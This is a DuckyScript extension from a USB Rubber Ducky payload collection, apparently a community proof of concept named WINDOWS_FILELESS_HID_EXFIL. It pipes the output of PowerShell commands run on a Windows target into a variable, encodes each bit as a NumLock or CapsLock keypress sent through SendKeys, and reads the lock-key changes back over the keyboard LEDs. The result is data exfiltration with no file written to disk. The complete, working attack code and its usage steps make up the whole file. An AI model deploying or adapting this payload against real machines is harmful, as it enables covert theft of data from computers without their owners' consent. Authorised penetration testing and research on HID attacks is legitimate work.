usbrubberducky-payloads/payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL

45 lines
1.9 KiB
Plaintext
Raw Normal View History

EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION